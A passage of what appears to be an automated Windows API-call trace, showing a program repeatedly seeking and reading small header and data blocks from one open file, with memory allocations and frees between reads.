hFile=0x2d0, liDistanceToMove=0x1b51d, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=111901) returned 1 [0113.305] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.305] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1b577, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=111991) returned 1 [0113.305] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x14c, lpOverlapped=0x0) returned 1 [0113.312] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.312] malloc (_Size=0x34) returned 0x12ef43d0 [0113.312] free (_Block=0x12ef2cf0) [0113.313] free (_Block=0x12ed3fc0) [0113.314] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1b6d3, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=112339) returned 1 [0113.315] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.315] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1b724, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=112420) returned 1 [0113.315] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x472, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x472, lpOverlapped=0x0) returned 1 [0113.316] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.316] malloc (_Size=0x2f) returned 0x12ef4410 [0113.317] free (_Block=0x12ef43d0) [0113.317] free (_Block=0x12ef2fc0) [0113.319] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1bba6, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=113574) returned 1 [0113.319] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.319] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1bbf2, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=113650) returned 1 [0113.320] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x412, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x412, lpOverlapped=0x0) returned 1 [0113.322] malloc (_Size=0x48) returned 0x12ef2d40 [0113.322] malloc (_Size=0x34) returned 0x12ef43d0 [0113.322] free (_Block=0x12ef4410) [0113.322] free (_Block=0x12ef2cf0) [0113.324] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1c014, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=114708) returned 1 [0113.324] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.324] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1c065, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=114789) returned 1 [0113.324] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xf4, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xf4, lpOverlapped=0x0) returned 1 [0113.325] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.325] malloc (_Size=0x26) returned 0x12ef1560 [0113.328] free (_Block=0x12ef43d0) [0113.328] free (_Block=0x12ef2d40) [0113.329] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1c169, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=115049) returned 1 [0113.330] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.330] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1c1ac, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=115116) returned 1 [0113.330] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x147, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x147, lpOverlapped=0x0) returned 1 [0113.331] malloc (_Size=0x48) returned 0x12ef2d40 [0113.331] malloc (_Size=0x2000) returned 0x12e09eb0 [0113.331] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x41276, lpNewFilePointer=0x208ef10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ef10*=266870) returned 1 [0113.331] ReadFile (in: hFile=0x2d0, lpBuffer=0x12e09eb0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208eee0, lpOverlapped=0x0 | out: lpBuffer=0x12e09eb0*, lpNumberOfBytesRead=0x208eee0*=0x2000, lpOverlapped=0x0) returned 1 [0113.331] free (_Block=0x12e17f20) [0113.331] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.332] free (_Block=0x12ef1560) [0113.332] free (_Block=0x12ef2cf0) [0113.334] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1c303, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=115459) returned 1 [0113.334] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.334] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1c368, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=115560) returned 1 [0113.334] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x118, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x118, lpOverlapped=0x0) returned 1 [0113.335] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.335] malloc (_Size=0x32) returned 0x12ef43d0 [0113.613] free (_Block=0x12ef2fc0) [0113.614] free (_Block=0x12ef2d40) [0113.617] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1c490, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=115856) returned 1 [0113.617] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.617] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1c4df, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=115935) returned 1 [0113.617] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xf3, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xf3, lpOverlapped=0x0) returned 1 [0113.621] malloc (_Size=0x48) returned 0x12ef2d40 [0113.622] malloc (_Size=0x2c) returned 0x12ef4410 [0113.622] free (_Block=0x12ef43d0) [0113.623] free (_Block=0x12ef2cf0) [0113.624] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1c5e2, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=116194) returned 1 [0113.624] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.624] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1c62b, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=116267) returned 1 [0113.624] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xc02, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xc02, lpOverlapped=0x0) returned 1 [0113.625] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.626] malloc (_Size=0x3d) returned 0x12ef2fc0 [0113.626] free (_Block=0x12ef4410) [0113.626] free (_Block=0x12ef2d40) [0113.628] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1d23d, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=119357) returned 1 [0113.628] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.628] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1d297, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=119447) returned 1 [0113.628] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x14b, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x14b, lpOverlapped=0x0) returned 1 [0113.629] malloc (_Size=0x48) returned 0x12ef2d40 [0113.629] malloc (_Size=0x31) returned 0x12ef43d0 [0113.630] free (_Block=0x12ef2fc0) [0113.630] free (_Block=0x12ef2cf0) [0113.631] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1d3f2, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=119794) returned 1 [0113.631] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.631] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1d440, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=119872) returned 1 [0113.631] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x2fc, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x2fc, lpOverlapped=0x0) returned 1 [0113.633] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.633] malloc (_Size=0x47) returned 0x12ef2fc0 [0113.633] free (_Block=0x12ef43d0) [0113.633] free (_Block=0x12ef2d40) [0113.648] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1d74c, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=120652) returned 1 [0113.648] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.648] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1d7b0, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=120752) returned 1 [0113.648] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x470, lpOverlapped=0x0) returned 1 [0113.650] malloc (_Size=0x48) returned 0x12ef2d40 [0113.650] malloc (_Size=0x29) returned 0x12ef43d0 [0113.651] free (_Block=0x12ef2fc0) [0113.651] free (_Block=0x12ef2cf0) [0113.654] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1dc30, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=121904) returned 1 [0113.654] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.654] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1dc76, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=121974) returned 1 [0113.654] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x52d, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x52d, lpOverlapped=0x0) returned 1 [0113.658] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.658] malloc (_Size=0x32) returned 0x12ef4410 [0113.659] free (_Block=0x12ef43d0) [0113.659] free (_Block=0x12ef2d40) [0113.661] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1e1b3, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=123315) returned 1 [0113.661] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.661] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1e202, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=123394) returned 1 [0113.661] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x16a, lpOverlapped=0x0) returned 1 [0113.664] malloc (_Size=0x48) returned 0x12ef2d40 [0113.664] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.665] free (_Block=0x12ef4410) [0113.665] free (_Block=0x12ef2cf0) [0113.667] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1e37c, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=123772) returned 1 [0113.667] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.667] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1e3e1, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=123873) returned 1 [0113.668] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x460, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x460, lpOverlapped=0x0) returned 1 [0113.672] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.672] malloc (_Size=0x2e) returned 0x12ef43d0 [0113.673] free (_Block=0x12ef2fc0) [0113.673] free (_Block=0x12ef2d40) [0113.675] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1e851, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=125009) returned 1 [0113.675] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.675] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1e89c, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=125084) returned 1 [0113.675] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x1056, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x1056, lpOverlapped=0x0) returned 1 [0113.676] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.677] malloc (_Size=0x3d) returned 0x12ef2d40 [0113.677] free (_Block=0x12ef43d0) [0113.677] free (_Block=0x12ef2cf0) [0113.679] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1f902, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=129282) returned 1 [0113.679] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.679] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1f95c, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=129372) returned 1 [0113.679] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x10a, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x10a, lpOverlapped=0x0) returned 1 [0113.682] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.682] malloc (_Size=0x3d) returned 0x12ed3fc0 [0113.682] free (_Block=0x12ef2d40) [0113.683] free (_Block=0x12ef2fc0) [0113.684] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1fa76, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=129654) returned 1 [0113.684] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.684] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1fad0, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=129744) returned 1 [0113.684] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x126, lpOverlapped=0x0) returned 1 [0113.685] malloc (_Size=0x48) returned 0x12ed3840 [0113.685] malloc (_Size=0x3f) returned 0x12ef2d40 [0113.686] free (_Block=0x12ed3fc0) [0113.686] free (_Block=0x12ef2cf0) [0113.687] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1fc06, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=130054) returned 1 [0113.687] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.687] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1fc62, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=130146) returned 1 [0113.688] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x2a4, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x2a4, lpOverlapped=0x0) returned 1 [0113.689] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.689] malloc (_Size=0x34) returned 0x12ef43d0 [0113.689] free (_Block=0x12ef2d40) [0113.690] free (_Block=0x12ed3840) [0113.691] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1ff16, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=130838) returned 1 [0113.691] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.691] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1ff67, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=130919) returned 1 [0113.691] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x173, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x173, lpOverlapped=0x0) returned 1 [0113.695] malloc (_Size=0x48) returned 0x12ef2d40 [0113.695] malloc (_Size=0x27) returned 0x12ef1290 [0113.695] free (_Block=0x12ef43d0) [0113.696] free (_Block=0x12ef2cf0) [0113.704] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x200ea, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=131306) returned 1 [0113.704] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.704] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2012e, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=131374) returned 1 [0113.704] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x145, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x145, lpOverlapped=0x0) returned 1 [0113.706] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.706] malloc (_Size=0x2d) returned 0x12ef43d0 [0113.707] free (_Block=0x12ef1290) [0113.707] free (_Block=0x12ef2d40) [0113.712] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x20283, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=131715) returned 1 [0113.713] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.713] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x202cd, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=131789) returned 1 [0113.713] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x4a5, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x4a5, lpOverlapped=0x0) returned 1 [0113.714] malloc (_Size=0x48) returned 0x12ef2d40 [0113.714] malloc (_Size=0x3d) returned 0x12ef2fc0 [0113.714] free (_Block=0x12ef43d0) [0113.715] free (_Block=0x12ef2cf0) [0113.721] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x20782, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=132994) returned 1 [0113.721] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.721] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x207dc, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=133084) returned 1 [0113.721] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x126, lpOverlapped=0x0) returned 1 [0113.722] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.723] malloc (_Size=0x43) returned 0x12ed3fc0 [0113.723] free (_Block=0x12ef2fc0) [0113.724] free (_Block=0x12ef2d40) [0113.726] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x20912, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=133394) returned 1 [0113.727] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.727] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x20972, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=133490) returned 1 [0113.727] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x138, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x138, lpOverlapped=0x0) returned 1 [0113.729] malloc (_Size=0x48) returned 0x12ed3840 [0113.729] malloc (_Size=0x3d) returned 0x12ef2fc0 [0113.729] free (_Block=0x12ed3fc0) [0113.730] free (_Block=0x12ef2cf0) [0113.731] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x20aba, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=133818) returned 1 [0113.731] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.731] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x20b14, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=133908) returned 1 [0113.731] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x127, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x127, lpOverlapped=0x0) returned 1 [0113.732] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.732] malloc (_Size=0x41) returned 0x12ef2d40 [0113.732] free (_Block=0x12ef2fc0) [0113.733] free (_Block=0x12ed3840) [0113.735] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x20c4b, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=134219) returned 1 [0113.735] ReadFile (in: hFile=0x2d0, 